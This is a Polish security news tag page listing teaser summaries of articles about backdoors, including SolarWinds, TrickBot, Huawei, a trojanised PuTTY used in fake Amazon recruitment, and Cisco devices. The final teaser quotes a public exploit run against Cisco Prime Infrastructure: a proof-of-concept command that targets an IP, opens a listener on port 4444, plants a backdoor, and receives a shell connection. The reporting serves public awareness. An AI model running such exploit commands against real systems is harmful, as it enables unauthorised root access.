-15% na nową książkę sekuraka: Wprowadzenie do bezpieczeństwa IT. Przy zamówieniu podaj kod: 10000

Tag: backdoor

Hakerzy z Korei Północnej w trakcie fałszywej rekrutacji do Amazona, proszą o ściągnięcie zbackdoorowanej wersji klienta Putty

16 września 2022, 12:23 | W biegu | komentarze 4
Hakerzy z Korei Północnej w trakcie fałszywej rekrutacji do Amazona, proszą o ściągnięcie zbackdoorowanej wersji klienta Putty

Według opublikowanego raportu Mandiant, za ten wektor ataku odpowiedzialna jest grupa UNC4034 operująca głównie z Korei Północnej. Atak tak naprawdę jest kampanią phishingową polegającą na kontaktowaniu się za pośrednictwem e-mail z osobami poszukującymi prace i oferowaniu im wysokiego wynagrodzenia w Amazon. Na etapie rekrutacji, rekruter za pośrednictwem komunikatora WhatsApp prosi…

Czytaj dalej »

Masz Microsoft Exchange? Zobacz, dlaczego ostatnia podatność jest inna niż znane wcześniej

07 marca 2021, 14:25 | Aktualności | komentarzy 10
Masz Microsoft Exchange? Zobacz, dlaczego ostatnia podatność jest inna niż znane wcześniej

Microsoft Exchange Server jest rozwiązaniem, które od prawie ćwierć wieku wyznacza pewien standard pracy grupowej. Warto pamiętać, że jest to nie tylko serwer pocztowy, a połączone z Outlookiem środowisko, pozwalające pracować w sposób, bez którego pracownicy największych firm na świecie nie wyobrażają sobie realizacji swoich codziennych zadań. Nie bez powodu porównuje…

Czytaj dalej »

Malware przeżywający reinstalacje OS. Supermicro ostrzega przed nową funkcją malware TrickBot i wypuszcza łaty na BIOS

07 marca 2021, 10:45 | W biegu | komentarze 2
Malware przeżywający reinstalacje OS. Supermicro ostrzega przed nową funkcją malware TrickBot i wypuszcza łaty na BIOS

Masz serwer czy PC-ta, na który dostał się nieproszony gość. No więc w ostateczności robisz pełen reinstall przywracasz pliki i cieszysz się z nowego systemu :-) Czasem jednak to nie wystarczy. Supermicro pisze o nowej funkcji TrickBoot, w Trickbocie: TrickBoot is a new functionality within the TrickBot malware toolset capable of discovering…

Czytaj dalej »

Politico: agencja odpowiedzialna za broń atomową w USA zhackowana. Buszowali (buszują?!) po sieciach wewnętrznych…

17 grudnia 2020, 22:21 | W biegu | komentarze 2
Politico: agencja odpowiedzialna za broń atomową w USA zhackowana. Buszowali (buszują?!) po sieciach wewnętrznych…

Całość to kolejne pokłosie afery z Solarwinds – tym razem Politico pisze tak: The Energy Department and National Nuclear Security Administration, which maintains the U.S. nuclear weapons stockpile, have evidence that hackers accessed their networks as part of an extensive espionage operation that has affected at least half a dozen…

Czytaj dalej »

Bezpieczeństwo świata chronione jest hasłem: solarwinds123 :) 18 000 klientów z całego świata zainstalowało aktualizację z backdoorem.

15 grudnia 2020, 21:49 | W biegu | komentarze 2
Bezpieczeństwo świata chronione jest hasłem: solarwinds123 :) 18 000 klientów z całego świata zainstalowało aktualizację z backdoorem.

Tytuł może nieco przesadzony, ale tylko w pierwszej części ;) W każdym razie mamy dalszy ciąg globalnej afery z firmą Solarwinds. Jeden z badaczy cytowany przez Reutersa zeznał, że jeszcze w 2019 roku zgłaszał problem z publicznie dostępnym serwerem Solarwinds, który wg relacji „chroniony” był hasłem solarwinds123. Niedawno też firma…

Czytaj dalej »

Amerykańskie agencje pohackowane. Napastnicy wbudowali backdoor w aktualizację oprogramowania Solarwinds Orion… używanego również przez Polskę

14 grudnia 2020, 10:57 | W biegu | komentarzy 14
Amerykańskie agencje pohackowane. Napastnicy wbudowali backdoor w aktualizację oprogramowania Solarwinds Orion… używanego również przez Polskę

Co dopiero pisaliśmy o ataku na amerykański Departament Skarbu, a tymczasem pokazało się więcej informacji o samym incydencie, które dodatkowo wskazują na o wiele większą kampanię: The victims have included government, consulting, technology, telecom and extractive entities in North America, Europe, Asia and the Middle East.  Cały czas mowa jest…

Czytaj dalej »

Wykryto backdoory w słowackiej sieci rządowej. Potencjalna możliwość podsłuchu rozmów / emaili.

15 czerwca 2020, 12:42 | W biegu | komentarzy 5
Wykryto backdoory w słowackiej sieci rządowej. Potencjalna możliwość podsłuchu rozmów / emaili.

O sprawie piszą lokalne, słowackie media. W sprawie zadziałała Národná kriminálna agentúra i zatrzymano czterech podejrzanych (w tym wysoko postawiona osoba – generał Peter Ď.) Nie ma dostępnych wielu szczegółów (dobro śledztwa), ale jest mowa o wyizolowanych z sieci rządowej urządzeniach: The devices will now be examined by experts who…

Czytaj dalej »

USA: mamy dowód, że Huawei ma backdoora dającego dostęp do sieci telco na całym świecie

12 lutego 2020, 12:07 | W biegu | komentarzy 15
USA: mamy dowód, że Huawei ma backdoora dającego dostęp do sieci telco na całym świecie

Dziennikarze na całym świecie klepią wierszówki. Tymczasem całego newsa można by zmieścić w jednym zdaniu: USA twierdzi, że ma dowody na obecność backdorów w sprzęcie telekomunikacyjnym 4G od Huawei; backdoory te umożliwiają zdalny dostęp do części infrastruktury telekomunikacyjnej bez wiedzy operatorów GSM. Do tej pory konkrety były utrzymywane w tajemnicy,…

Czytaj dalej »

Chińska „narodowa appka” (m.in. muszą w niej zdawać egzamin dziennikarze) – z backdoorami. 100 milionów+ instalacji

15 października 2019, 08:01 | W biegu | komentarze 2
Chińska „narodowa appka” (m.in. muszą w niej zdawać egzamin dziennikarze) – z backdoorami. 100 milionów+ instalacji

Oficjalna narodowa chińska appka (przeszło 100 milionów instalacji) umożliwia tak fascynujące czynności jak czytanie i komentowanie „ciekawych artykułów” czy wykonywanie quizów o chińskim liderze Xi Jinping-u. Relaks relaksem, ale jak donosi BBC używanie appki jest też powiązane z wysokością otrzymywanej pensji, a dziennikarze muszą w niej zdać „test” aby otrzymać odpowiednie…

Czytaj dalej »

Ile kosztuje implantowanie sprzętowego backdoora? Kilka złotych + umiejętności lutowania. Pokazał taką procedurę na przykładzie Cisco ASA

12 października 2019, 10:54 | Aktualności | komentarzy 21
Ile kosztuje implantowanie sprzętowego backdoora? Kilka złotych + umiejętności lutowania. Pokazał taką procedurę na przykładzie Cisco ASA

Z jednej strony zeszłorocznych rewelacji Bloomberga dotyczących implantów sprzętowych nikt nie potwierdził, a wręcz było to przedmiotem pobłażliwych uśmiechów, z drugiej – mamy tanią, do wykonania nawet domowymi metodami procedurę instalacji tego typu backdoora. Od strony technicznej badacz użył taniego urządzenia Cisco ASA 5505 (oferującego funkcje: firewalla, IPSa, VPNa) kupionego na…

Czytaj dalej »

Nad WhatsApp i inne komunikatory nadciągają ciemne chmury? „Ghost protocol” dający dostęp agencjom wywiadowczym dostęp do zaszyfrowanych danych…

01 sierpnia 2019, 21:44 | W biegu | komentarzy 7

Guardian donosi z zakończonym spotkaniu przedstawicieli Pięciorga Oczu. Spotkanie poświęcone było walce z terroryzmem i ochroną dzieci, ale wg doniesień głównym tematem były coraz bardziej efektywne metody szyfrowania komunikacji: Dealing with the challenge faced by increasingly effective encryption was one of the main topics at the summit. Odpowiednie argumenty, pomasowanie…

Czytaj dalej »

Cisco Prime Infrastructure – można dostać uprawnienia root bez uwierzytelnienia

18 maja 2019, 17:08 | W biegu | komentarze 2

Łata od Cisco tutaj. Krytyczność podatności to aż 9.8/10 w skali CVSS. Ale możliwość uzyskania dostępu na system operacyjny i później łatwa eskalacja uprawnień do roota to jest coś. Działanie dostępnego już exploitu: $ ./poc.py 192.168.100.123 192.168.100.2:4444 (+) planted backdoor! (+) starting handler on port 4444 (+) connection from 192.168.100.123…

Czytaj dalej »